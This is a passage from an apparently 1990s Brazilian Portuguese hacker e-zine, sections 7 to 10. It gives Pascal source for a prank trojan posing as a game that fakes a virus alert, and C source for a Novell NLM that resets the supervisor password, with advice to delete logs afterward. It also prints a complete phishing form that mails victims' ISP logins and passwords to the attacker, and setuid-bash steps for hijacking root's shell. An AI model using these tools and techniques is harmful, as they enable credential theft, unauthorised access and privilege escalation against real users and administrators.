$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  7. VIRII  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

        Trojan em Pascal (por THUNDER WOH)

	Esse trojan simula uma paralização no sistema, o que assustara um
monte o lamer.

----------------------------Corte Aki--(BUG.PAS)-----------------------------
program woh_virii_simul;
uses crt;
var
x:array[1..100] of integer;
j:integer;
t,t2:char;
begin
clrscr;
writeln('                    Game of the Dragon           Version 1.6');
delay(33000);
writeln('(c) Copyright 1993 Microprose inc. ');
writeln('All rights reserved.');
writeln;
delay(44000);delay(44440);
clrscr;
write('Now loading game:');write('.');delay(50000); write('.');delay(50000);
write('.');delay(30000);write('.');delay(50000);
write('.');delay(30000);write('.');delay(30000);write('.');
write('.');delay(50000);write('.');delay(30000);delay(60000);
writeln;
clrscr;
writeln;
writeln('Checking Hard Drive space to start the game:');
     for j:=1 to 100 do
      begin
      gotoxy(7,3);
      write(j,'% checked     ');
      delay(4000);
      end;
        delay(2000);
        writeln;
        writeln;
        writeln;
        writeln('The virus Michellangelo was found in your computer!');
	writeln('Red Alert!!!!');
        delay(20000);
        writeln;
        Writeln('         Impossivel achar COMMAND.COM! Sistema Paralizado');
          for j:=1 to 100 do
          delay (50000);
            writeln;
            Writeln ('Ta assustado LAMER???');
            nosound;
end.

-----------------------------------------------------------------------------

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  8. Redes  $$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$          $$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--=-=-=-

	Redes Novell

	Bem.. O krinha que disse que tava escrevendo a materia, sumiu como
se fosse vento. Eu pedi para ele escrever a materia logo depois que ele me
contou que havia hackeado uma rede novell. então achei que ele entendesse do
assunto e pedi a colaboração dele. Mas acho que ele foi pego ou tah traba-
lhando em algo.
	Então eu mesmo decidi escrever isso, embora não saiba muito sobre
novell. A pouco tempo eu consegui 2 programas muito bons para hackear redes
novell. Ambos jah compilados em formato .nlm . Com um pouco de busca eu con-
segui encontrar a fonte de um deles o outro ainda não.

	O nome desse programa eh SETPWD.NLM e foi escrito por P.R.Lees em C.
O que ele faz é permitir a alteração da senha do supervisor.
	Faça o seguinte:
1. Compile-o e copie-o para um disquete.
2. Insira o disquete no servidor
3. Saia do monitor ou qquer outra coisa que esteja sendo carregada ateh vol-
   tar para o prompt.
4. Digite : load a:\setpass.nlm
5. Retire o disquete e apage o log file para não deixar pistas.

	Note que para isso vc precisara invadir fisicamente o provedor.

----------------------------Corte Aki--(setpwd.nlm)--------------------------
/*
	 SETPWD 1.0 - Sets a Novell User Password
    Copyright (C) 1992  P.R.Lees

	*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <process.h>
#include <nwcntask.h>
#include <nwbindry.h>

main(int argc,char *argv[])
{
int err;
printf("[SetPwd.nlm (c) 1992 P.R.Lees]\n");
if (argc!=3)
	{
	printf("Usage:\n\tLoad SetPwd <Username> <Password>\n");
	exit(2);
	}

err=ChangeBinderyObjectPassword(argv[1],OT_USER,"",strupr(argv[2]));
if (err)
	{
	switch(err)
		{
		case 150:printf("Server out of Memory\n");break;
		case 215:printf("Password is not unique\n");break;
		case 240:printf("Wildcard not allowed\n");break;
		case 251:printf("No such Property\n");break;
		case 252:printf("No such Object\n");break;
		case 254:printf("Server bindery locked\n");break;
		case 255:printf("No such object or Bad Password\n");break;
		default:printf("Netware Error 0x%X (%d)\n",err,err);break;
		}
	exit(err);
	}
printf("Passwd of %s has been set to %s\n",strupr(argv[1]),strupr(argv[2]));
exit(0);
}

-----------------------------------------------------------------------------

	É soh isso. O outro programa é o burglar.nlm . Quem tiver a fonte de
outros programas tipo esse, mandem pra mim. Ou se preferir, Mandem uma ma-
teria sobre Novell.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$
$$$$$$  9. Invasão de privacidade  $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Trojans em WWW

	Hahaha!! Dei muita gargalhada quando acessei uma page hacker, a qual
eu não quero dizer o nome, e encontrei uma informação dizendo que uns kras
haviam descoberto uma nova falha no cgi-bin capaz de deletar as horas da sua
conta no seu provedor e outro que dizia conseguir um dominio gratis no pró-
prio servidor de www.
	Tudo oque vc precisará fazer é preencher um script em forma de for-
mulario onde faziam perguntas tipo.."Seu username : ", "Sua senha : ", Seu
provedor : ", etc.
	Ae vc sabe o que acontece não eh? Envia os dados para o e-mail do
dono do script. Isso eh um tróço meio babaca de se colocar no meio de uma
page hacker. Quantos hackers que acessam essas paginas não olham a fonte da
pagina antes de clikar nos botões do java-script?? Acho que nenhum.
	Isso pode ateh pegar uns lamahs, mas imagina quanto lixo não aparece-
ria no seu mailbox.
	De qquer forma, achei isso bem criativo, para se colocar em paginas
pessoais e convidar seus amigos para visitar. hehehe.
	Aki vai a fonte inteira do script.

---------------------------Corte Aki--(script.html)--------------------------
<HTML>
<HEAD>
   <TITLE>Delete suas horas no seu provedor </TITLE>
</HEAD>
<BODY>
<CENTER><P><FONT COLOR="#000000"><FONT SIZE=+3>Delete as horas usadas do
seu provedor</FONT></FONT><P>

<FONT COLOR="#000000">Para vc deletar suas horas usadas no seu provedor,
basta preencher os campos abaixo corretamente, e acionar esse script!</FONT>
</P></CENTER>
<P><FORM action="mailto:seu@email.com" method="POST"></P>
<P><FONT COLOR="#000000">&nbsp;</FONT>&nbsp; </P>
<DIV ALIGN=right><TABLE WIDTH="100%" COLS="2" >

<TR>
<TD><FONT COLOR="#000000">Seu Provedor :</FONT></TD>
<TD><INPUT type="TEXT" name="Host" size="35"><BR> &nbsp;</TD>
</TR>

<TR>
<TD><FONT COLOR="#000000">Seu login :</FONT></TD>
<TD><INPUT type="TEXT" name="Login" size="35"><BR> &nbsp;</TD>
</TR>

<TR>
<TD><FONT COLOR="#000000">Sua senha :</FONT></TD>
<TD><INPUT type="TEXT" name="senha" size="35"><BR> &nbsp;</TD>
</TR>

</TABLE></DIV>

<P>&nbsp;&nbsp; &nbsp;<INPUT type="SUBMIT" value="Acionar Script"><INPUT
  type="RESET" value="Limpar todos os campos">
</P>

</BODY>
</HTML>
-----------------------------------------------------------------------------

	Antes de salva-lo soh troca alí a linha:

<FORM action="mailto:seu@email.com" method="POST">

	Colocando o seu email aí onde diz seu@email.com.
	O autor desses scripts chama-se Spider. Talvéz ele não gosta de eu
ter publicado aki o seu truque mas nao esquenta kra, afinal, eu duvido que
alguem que leia esta zine desde a numero 00 caia nessa.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-===-=-=-=-=-=-=-=-=-=-=-=

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$
$$$$$$$                   $$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  10. Hack, the Art  $$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                   $$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Tirando o root do root.

	Esse eh um bug que eu descobri e eu acho que soh eu, pois não encon-
trei nada parecido na rootshell(site de busca a bugz e exploits). Porém qquer
um que pensasse um pouquinho e tivesse o Unix clarou, descobreria.
	O root pode se livrar disso rapidinho, mas se ele for muito lamer vai
lhe dar as horas que precisa para entrar com a conta dele e..
	Existem 2 maneiras de fazer isso. Com um trojan e se vc jah tiver
hackeado o sistema.

.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,. Trojan ,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,

Faça o seguinte.

1. Mande uma copia do se /bin/bash para a shell com outro nome qquer.
2. Acesse a shell e modifique as permisões do arquivo para 777.
3. Por fim modifique para +s('chmod u+s <arquivo>')
4. Agora deixe num diretório publico e diga para o root dar uma olhada no
   programa ou no jogo que apareceu.
5. Prepare o telnet e a senha..
6. Recomendo que vc não use a sua shell, pois serah facil ser descoberto.

,.,.,.,.,.,.,.,.,.,.,.,.,.,.,., Hackeando ,.,.,.,.,.,.,.,.,.,.,.,.,.,.,

	Esse vai deixar o root puto se não conseguir arrumar o bug, por sim-
plesmente ele não ser mais o root.

1. Digite 'cat /etc/passwd | grep :0:0:' para verificar a linha da conta do
   root.
2. Verifique a shell dele. Digamos que seja a /bin/bash.
3. Então modifique o autor da /bin/bash para outro usuario do sistema, q não
   seja vc. Um usuário que vc tenha acesso. Cmd: 'chown <user> /bin/bash'.
4. Reconecte como este usuário no sistema e modifique o /bin/bash para +s.
   Cmd: 'chmod u+s /bin/bash'.
5. Prontinho. Eh soh o root dah uma folga que quando ele relogar. Tcham!
   Tcham! Tcham! Tcham!!!! Ele logará como akele usuario.

,.,.,.,.,.,.,.,.,.,.,.,.,.,.,., Consequencias ,.,.,.,.,.,.,.,.,,.,.,.,.,.

	Quando eh feito o segundo módo, todos os usuarios que usarem a shell
do root, ficarão como se fossem o mesmo usuario. Ae é foda de se achar. hehe.

.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,. Corrigindo .,.,.,.,.,.,.,.,.,.,.,.,.,.,.,

	Eu não costumo a publicar isso, mas eh tão mole que qquer um desco-
briria. No trojan vc soh precisa dar 'exit' para sair da shell e depois mudar
a permisão do arquivo para -s. No 2o metodo é soh mudar a permisão e relogar.
	Explicando em comandos:

1.
$ exit
# chmod u-s /bin/bash

2.
$ chmod u-s /bin/bash
$ logout

,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,., Nota ,.,.,.,.,.,.,.,.,.,.,.,.,.,.,.,

	Alguem nesse mundo jah deve ter descoberto este bug, mas o motivo de
não publica-lo deve ser por ter achado meio idiota.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

        Ainda estou precisando de editores.
        As materias devem ser mandadas pelo e-mail da revista.
        Se voce for mandar mail-anonymo, entaum coloque o seu nick junto.
Caso contrario o autor da materia aparecerah como Anonymous.
        Falow kras.
